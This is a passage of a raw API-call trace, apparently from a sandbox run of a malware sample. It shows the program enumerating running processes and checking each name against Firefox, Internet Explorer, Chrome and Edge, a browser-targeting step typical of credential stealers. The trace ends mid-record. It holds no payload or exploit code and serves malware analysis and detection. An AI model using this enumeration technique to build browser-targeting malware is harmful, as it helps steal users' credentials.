th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0207.996] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0207.996] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0207.996] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0207.996] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.996] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.996] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0207.996] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0207.996] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0207.996] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.996] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.997] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0207.997] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0207.997] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0207.997] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.997] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.998] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0207.998] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0207.998] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0207.998] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.998] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.998] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0207.998] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0207.998] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0207.998] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.998] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.999] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0207.999] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0207.999] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0207.999] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.999] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0207.999] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0207.999] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0207.999] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0207.999] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.999] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.000] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0208.000] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0208.000] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0208.000] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.000] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.000] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0208.000] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0208.000] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0208.000] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.000] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0208.001] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0208.001] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0208.001] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0208.001] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.001] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0208.001] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0208.002] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0208.002] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0208.002] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.002] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0208.002] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0208.002] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0208.002] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0208.002] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.002] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.003] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0208.003] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0208.003] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0208.003] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.003] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0208.003] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0208.003] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0208.003] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0208.003] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.003] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0208.004] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0208.004] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0208.004] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0208.004] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.004] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0208.004] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0208.004] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0208.004] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0208.004] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.004] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0208.005] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0208.005] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0208.005] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0208.005] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.005] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0208.006] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0208.006] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0208.006] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0208.006] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.006] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0208.006] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0208.006] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0208.006] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0208.006] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.006] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0208.007] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0208.007] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0208.007] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0208.007] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.007] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0208.007] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0208.007] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0208.007] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0208.007] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.007] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0208.008] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0208.008] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0208.008] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0208.008] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.008] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0208.008] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0208.008] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0208.008] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0208.008] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.008] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0208.009] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0208.009] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0208.009] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0208.009] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.009] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0208.010] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0208.010] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0208.010] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0208.010] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.010] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0208.010] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0208.010] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0208.010] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0208.010] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.010] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0208.011] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0208.011] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0208.011] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0208.011] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.011] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0208.011] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0208.011] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0208.011] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0208.011] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.011] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0208.012] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0208.012] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0208.012] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0208.012] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.012] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0208.012] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0208.012] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0208.012] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0208.012] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.012] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0208.013] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0208.013] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0208.013] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0208.013] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.013] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0208.014] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0208.014] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0208.014] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0208.014] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.014] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0208.014] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0208.014] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0208.014] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0208.014] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.014] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0208.015] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0208.015] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0208.015] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0208.015] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.015] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0208.015] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0208.015] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0208.015] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0208.015] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.015] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0208.016] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0208.016] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0208.016] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0208.016] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.016] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.016] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0208.016] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0208.016] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0208.016] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.016] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0208.017] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0208.017] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0208.017] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0208.017] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.017] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.017] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0208.018] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0208.018] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0208.018] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.018] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0208.018] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0208.018] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0208.018] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0208.018] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.018] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.019] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0208.019] lstrcmpiA (lpString1="svchost.exe", 